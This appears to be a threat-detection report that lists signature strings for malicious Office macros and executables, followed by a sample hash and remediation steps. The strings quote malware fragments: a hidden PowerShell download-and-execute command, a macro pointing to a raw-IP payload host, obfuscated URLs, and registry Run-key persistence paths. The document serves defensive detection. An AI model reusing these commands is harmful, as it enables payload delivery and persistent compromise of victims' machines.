 - " Ie Ix Iplo Ire Ir.e Ix Ie ") & Chr( (MACROHSTR_EXT)
 - FrKonert & "\" & Me.Name &  (MACROHSTR_EXT)
 - ).createobject( (MACROHSTR_EXT)
 - ).run (MACROHSTR_EXT)
 - =chr((7*2)+(((10-4)*2)*2))&chr((((16/2)*2)+(4*5))*2)&mid( (MACROHSTR_EXT)
 - ").range(" (MACROHSTR_EXT)
 - ").value), (MACROHSTR_EXT)
 - ").value) (MACROHSTR_EXT)
 - ("fyf/hezkgeihy0ohikoztzkukutuzktkgekgyigekygh0mekvueikzeifoekztkbitkzthkubt{gq0hctg{0fujt/objebsgpdbnjvrfs00;tquui") (MACROHSTR_EXT)
 - =environ("temp")host="http://172.104.160.126:8099" (MACROHSTR_EXT)
 - =host+"/payload2.txt"mal_enc (MACROHSTR_EXT)
 - =createobject("wscript.shell")objshell.runpp,0,falseendsubsubdocument_open()mainfuncendsub (MACROHSTR_EXT)
 - cmd.exe /c "payload.bat" (PEHSTR_EXT)
 - msdownld.tmp (PEHSTR_EXT)
 - wextract.pdb (PEHSTR_EXT)
 - ="6874"'"http"part2="74703a2f2f"'":\\"part3="34352e313437"'"45.147"part4="2e3233312e3139352f6d73776f7264642e657865" (MACROHSTR_EXT)
 - bvukwxid0gimh0dha6ly9sb2x"encodedstring=encodedstring&"tywqubgl2zwjsb2cznjuuy29t"encodedstring=encodedstring&"l3jhbnnvbxdhcmuudhh0iiani" (MACROHSTR_EXT)
 - .runvbcomp.name&".downloadtwofilesfromurl"endsubfunction (MACROHSTR_EXT)
 - strEngine = UCase$(Application.StartupPath + "\" + cstrEngine) (MACROHSTR_EXT)
 - If Len(Dir(Application.StartupPath, vbDirectory)) = 0 Then MkDir Application.StartupPath (MACROHSTR_EXT)
 - GetVolumeInformation Left$(strEngine, InStr(1, strEngine, "\")), 0, 0, lngVolumeID, 0, 0, 0, 0 (MACROHSTR_EXT)
 - Application.ScreenUpdating = True (MACROHSTR_EXT)
 - cmdTarget.DeleteLines 1, cmdSource.CountOfLines (MACROHSTR_EXT)
 - wbkTarget.CustomDocumentProperties(pptVolume.Name).Value = pptVolume.Value (MACROHSTR_EXT)
 - e:\ivdvmrs vido\ivdvmrs vido\obj\Debug\ivdvmrs vido.pdb (PEHSTR_EXT)
 - SOF_TWA_RE\Mic_ro_soft\Win_dows\Cur_rent_Vers_ion\_Run (PEHSTR_EXT)
 - e:\wqeex\jedvmtrvh\jedvmtrvh\obj\Debug\jedvmtrvh.pdb (PEHSTR_EXT)
 - SOF_TWA_RE\Mic_rosoft\Win_dows\Current_Version\_Run (PEHSTR_EXT)
 - .exe| (PEHSTR_EXT)
 - = Environ("PROGRAMDATA") & "\ (MACROHSTR_EXT)
 - Do While uikjhnmt.Value <> "" (MACROHSTR_EXT)
 - Set uikjhnmt = uikjhnmt.Offset(1, 0) (MACROHSTR_EXT)
 - ").Range(" (MACROHSTR_EXT)
 - .SaveToFile yjktbyt, 2 (MACROHSTR_EXT)
 - .RunOnlyIfNetworkAvailable = (Len(fff1a755ab7f7f89adf85eab4a800915) = CInt(StrReverse(Asc(Right(fff1a755ab7f7f89adf85eab4a800915, 1)) - Str(Mid(fff1a755ab7f7f89adf85eab4a800915, 14, 1))))) (MACROHSTR_EXT)
 - oShell = "cmd /K " + "pow" + "er" + "Sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile  (MACROHSTR_EXT)
 - (New-Object System.Net.WebClient).DownloadFile('http://" + Base64Decode(Category + Language + Keywords + Comments) + (MACROHSTR_EXT)
 - /file.txt','%TEMP%\Yload.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Yload.ps1" (MACROHSTR_EXT)
 - .dll (PEHSTR)
 - zipUrl = "https:// (MACROHSTR_EXT)
 - .space/SoftsCompany/d/ (MACROHSTR_EXT)
 - savePath = Environ("TEMP") & "\" & CreateRandomName() & ".pptx (MACROHSTR_EXT)
 - pptUrl = "https://trmm.space/SoftsCompany/d/ (MACROHSTR_EXT)
 - DownloadFileWithProgress = fso.FileExists(savePath) (MACROHSTR_EXT)
 - ini()setfso=createobject("scri"&"pting.f"&"ilesyst"&"emobject")s32="syst"dimv()asstringps="dfdhghrevhjvcfeklgbnv18mm7hdfgh" (MACROHSTR_EXT)
 - src)<5thenexitfunctiondimiaslongfori=1tovba.lenb(src)-5if(src(i)=&h4d)and(src(i+1)=&h5a)and(src(i+2)=&h90)then (MACROHSTR_EXT)
 - dimraslongr=cp(0&,strptr(vba.strreverse(exec)),0&,0&,true,0&,byval0&,strptr(wd),tsi,tsa_pi)wfsotsa_pi.hp,17000 (MACROHSTR_EXT)
 - srwcrfldpfo&"\"&pfo1fso.copyfilethisworkbook.path&"\"&thisworkbook.name,tf&"\"&objt0fso.copyfiletf&"\"&tmpd,dfo&"\"&prot&"\"&dnauthisworkbook.protectps (MACROHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: 7aab9283bc3a6e6bdf97fa60443aa9f9a7555ab11f1d284e37506bc0f7fb63fb.vbs
7aab9283bc3a6e6bdf97fa60443aa9f9a7555ab11f1d284e37506bc0f7fb63fb
03/12/2025
Remediation Steps:
1. Isolate the affected machine from the network immediately. 2. Identify and delete the source of the infection (e.g., malicious email attachment or VBS file). 3. Run a full, updated antivirus scan to find and remove all dropped payloads and related components. 4. Review persistence locations such as Scheduled Tasks and Registry Run keys for malicious entries.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 03/12/2025. Do you want to analyze it again?
$ ls available-commands/
user@threatcheck.sh:~$ â–Š